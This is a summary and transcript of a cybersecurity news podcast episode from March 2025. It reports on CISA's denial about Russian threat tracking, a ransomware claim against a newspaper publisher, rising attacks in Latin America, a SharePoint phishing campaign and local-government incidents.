CISA denies claims, Ransomware group claims attack, Latin America's security crisis - Cybersecurity Headlines

Summary5 min read

Cyber Security Headlines – CISA Denies Claims, Ransomware Group Claims Attack, Latin America's Security Crisis

Hosted by CISO Series | Released on March 4, 2025

In the latest episode of Cyber Security Headlines, Lauren Verno delves into several pressing issues impacting the information security landscape. From governmental debunking of cyber threat priorities to escalating cyber crises in Latin America, the episode provides a comprehensive overview of current cybersecurity challenges.

CISA Denies Claims of Deprioritizing Russian Threats

Lauren Verno opens the episode addressing the contentious issue surrounding the Cybersecurity and Infrastructure Security Agency (CISA). Recent reports, including one from The Guardian, suggested that CISA had been instructed to deprioritize tracking Russian cyber threats. However, CISA vehemently denies these allegations.

Verno states, “CISA is pushing back against reports that it has been directed to stop tracking Russian cyber threats, calling the claim, quote, fake and a risk to national security” (00:07). This denial comes amid confirmations from The Record, The New York Times, and The Washington Post that U.S. Cyber Command has been ordered to pause offensive cyber operations against Russia during ongoing negotiations over the war in Ukraine.

The episode highlights bipartisan concerns, with lawmakers warning that such a shift “could weaken U.S. defenses against Russian cyber threats” (00:07), emphasizing the delicate balance between diplomatic negotiations and national security.

Ransomware Group Claims Attack on US Newspaper Publisher

Transitioning to cybercrime, Verno discusses the alarming claim by the Russian-speaking ransomware group Kulin regarding their attack on Lee Enterprises, one of the largest newspaper groups in the U.S. The group alleges the theft of 350 gigabytes of data, including financial records and journalist payments.

Kulin has provided purported evidence of the breach and has issued a threat: “We will leak the stolen data on March 5, potentially exposing sensitive information about the company's operations” (00:07). Lee Enterprises is currently “actively investigating the situation” (00:07), underscoring the growing threat ransomware poses to critical media infrastructures.

Latin America's Escalating Cybersecurity Crisis

One of the most concerning topics covered is the rapid rise of cyber threats in Latin America, which are outpacing global averages. Verno notes a 53% year-over-year increase in attacks, with organizations experiencing nearly 40% more weekly incidents than the global norm (00:07).

Experts attribute this surge to factors such as political instability, lagging cybersecurity adoption, and the rapid rise of financial technology. Sectors like healthcare, communications, and government are particularly targeted, facing 3,000 to 4,000 attacks per week. Brazil stands out as a hotspot where cybercriminals exploit inexperienced users and sometimes collaborate with cartels, exacerbating the security challenges (00:07).

CESA Flags Vulnerabilities in Cisco and Windows Systems

Verno highlights critical vulnerabilities identified by the Cybersecurity and Infrastructure Security Agency (CISA), which have been flagged in Cisco and Windows systems. U.S. federal agencies are mandated to address these flaws by the end of the month to prevent potential exploitation.

These vulnerabilities allow attackers to execute arbitrary commands and gain elevated privileges on affected devices. While CISA has confirmed active exploitation, specific details about the malicious activities or responsible parties remain undisclosed. More information on these flaws is available in the episode's show notes (00:07).

Polish Space Agency Investigates Cyber Attack

The episode reports on a significant cybersecurity incident involving Poland’s space agency, Pulsa. Unauthorized access was detected, leading to the disconnection of their network to contain the breach. Although the exact nature of the attack remains unconfirmed, there are concerns about potential ransomware involvement.

As of the latest update, Pulsa's website remains offline while authorities work to secure their systems and identify the attackers (00:07).

New Phishing Campaign Targets Microsoft SharePoint

Verno also discusses a sophisticated phishing campaign targeting Microsoft SharePoint accounts. This campaign employs a click-fix style attack, deceiving users into deploying a malicious PowerShell command that installs the Havok command and control (C2) framework.

Attackers are utilizing Microsoft’s Graph API to obscure C2 communications, making detection challenging by embedding malware stages within legitimate Microsoft services. Researchers express particular concern over the misuse of a legitimate Microsoft service, rather than the open-source framework, to amplify these cyber campaigns (00:07).

Microsoft Outage Update

Adding to the cybersecurity chaos, Microsoft is experiencing a tumultuous week with multiple outages affecting its services. According to Verno, a new Microsoft 365 outage on Monday has impacted not just Teams but also Outlook, OneDrive, and Exchange. While Microsoft attributes the previous weekend's outage to a coding issue, the current investigation is ongoing, leaving customers uncertain about the reliability of these essential services (00:07).

Multiple Local Governments Face Cyber Attacks

Local government agencies continue to grapple with persistent cyber attacks, disrupting essential services across various regions. For instance, a county in Maryland has been dealing with limited services for over a week, though critical services like 911 remain operational. Officials are still investigating the incident without confirming whether it is a ransomware attack.

Similar disruptions have been reported in Cleveland Municipal Court and Missouri’s Department of Conservation, indicating a widespread trend of cyber assaults on local government entities (00:07).

Discussion: The Idealism of a CISO

In a thought-provoking segment, Verno explores the challenges faced by Chief Information Security Officers (CISOs) in balancing cybersecurity decisions amidst real-world constraints such as time and budget. The discussion centers on the utilitarian approach to cybersecurity—“trying to do the most good for the most people”—and questions the practicality of implementing such ideals in high-pressure environments.

This segment invites listeners to reflect on the complexities of cybersecurity leadership and the often difficult trade-offs required to protect organizational assets effectively (00:07).

Conclusion

Lauren Verno's detailed coverage in this episode of Cyber Security Headlines underscores the multifaceted nature of today's cybersecurity landscape. From high-stakes governmental decisions and ransomware threats to regional security crises and the relentless evolution of cyber attacks, the episode provides valuable insights for professionals and enthusiasts alike.

For a deeper dive into each of these topics, visit CISOseries.com.

Note: Time-stamped quotes are attributed to Lauren Verno at 00:07, representing her commentary throughout the episode.

Loading summary

Transcript3 lines

[00:00]
Unknown Host
From the CISO series, it's Cybersecurity Headlines.
[00:07]
Lauren Verno
These are the cybersecurity headlines for Tuesday, March 4, 2025. I'm Lauren Verno. CISA denies claims of Deprioritizing Russian Threats CISA is pushing back against reports that it has been directed to stop tracking Russian cyber threats, calling the claim, quote, fake and a risk to national security. Now this is an update to a story that first appeared over the weekend in which the Guardian reported that a memo deprioritizing Russia was issued, an allegation that SISA and DHS officials deny, with one calling the report, quote, garbage. Meanwhile, the Record, the New York Times and the Washington Post confirm that U.S. cyber Command has been ordered to pause offensive cyber operations against Russia while negotiations over the war in Ukraine continue. Now, lawmakers on both sides are criticizing any shift warning it could weaken U.S. defenses against Russian cyber threats. Ransomware Group Claims Attack on US Newspaper Publisher this is an update to a story we previously reported on regarding the cyber attack against LI Enterprises, one of the largest newspaper groups in the U.S. we now know Russian speaking ransomware group Kulin has claimed responsibility for the attack, alleging it stole 350 gigabytes of data, including financial records and payment to journalists. The group provided supposed proof of the breach and warned that the stolen data will be leaked on March 5, potentially exposing sensitive information about the company's operations. Lee Enterprises says they are actively investigating the situation Latin America's Escalating Cybersecurity Crisis Cyber threats in Latin America are growing faster than anywhere else. New reports show that attacks are surging 53% year over year and organizations facing nearly 40% more weekly incidents than the global average. Now experts point to political instability, lagging cybersecurity adoption and the rapid rise of financial tech. Now some of the most impacted industries include healthcare, communications and governments, with an average of three to 4,000 attacks per week. Now these attacks are particularly affecting Brazil, where cybercriminals exploit inexperienced users and even collaborate with cartels. CESA Flags Cisco and Windows flaws U.S. federal agencies have until the end of the month to address flaws in Cisco and Windows systems, CISA reports. These flaws allow attackers to execute arbitrary commands and gain elevated privileges on vulnerable devices, with exploitation currently underway now. While the agency has noted these flaws are being actively exploited, it has not provided any specific details surrounding the malicious activity or who may be responsible. You can learn more about these specific flaws in the show Notes of today's episode thanks to this Week's episode sponsor ThreatLocker. Threat Locker is a global leader in zero trust endpoint security, offering cybersecurity controls to protect businesses from zero day attacks and ransomware. ThreatLocker operates with a default deny approach to reduce the attack surface and mitigate potential cyber vulnerabilities. To learn more and start your free trial, visit threatlocker.com that's T H R E A T L O C K er Polish Space Agency investigating cyber attack Poland's space agency, also known as Pulsa, is investigating a cybersecurity incident after unauthorized access was detected in its systems, prompting the agency to disconnect its network. Now some have raised concerns over potential ransomware involvement, though authorities have not confirmed the nature of the breach. As of Monday, Pulse's website remained offline while they work to secure systems and investigate who is behind the attack. Phishing campaign targets SharePoint, a new phishing campaign targeting Microsoft SharePoint accounts, uses a click fix style attack to trick users into deploying a malicious PowerShell command that ultimately installs the Havok command and control framework. Now the attackers leverage Microsoft's Graph API to hide the C2 communications, making it difficult to detect by disguising malware stages within legitimate services. Now researchers say it's not the open source framework used to amplify these campaigns, but the use of a legitimate Microsoft service that's most concerning. Microsoft outage Update Microsoft's having a bit of a rough week, and it's only Tuesday. The company says they're investigating a new Microsoft 365 outage on Monday, separate from the one over the weekend that affected Teams customers. Now, multiple customers have taken to social media to report that the outage affected more than just Teams, but also Outlook, OneDrive and Exchange. As of this recording, Microsoft was still investigating the incident on Monday, but stated over the weekend that that outage was caused by a coding issue. Multiple local governments experienced cyber attacks New year, same problem Several local government agencies are grappling with cyber attacks that have disrupted services, including a county in Maryland which has been dealing with limited services for over a week. While major services like 911 remain operational, county officials are still investigating the incident and cannot confirm if it is a ransomware attack. The trend continues, though, across multiple states, with other local agencies including the Cleveland Municipal Court and Missouri's Department of Conservation also affected by ongoing attacks. At this time, most of the government agencies have not provided any additional information other than they are investigating the incident. There's no idealism for a ciso. Cybersecurity decisions are always being made based on real world constraints, principally time and money. This can lead to a utilitarian focus on cybersecurity outcomes, trying to do the most good for the most people. That sounds good in theory, but how do you put that idea into practice? That's one of the segments we're digging into on this week's episode of the CISO Series podcast. Look for the new episode. All cybersecurity problems are easy to fix with unlimited time and budget. Wherever you get your podcast, I'm Lauren Verno reporting for the CISO series.
[08:24]
Unknown Host
Cybersecurity headlines are available every weekday. Head to CISoseries.com for the full stories behind the headlines.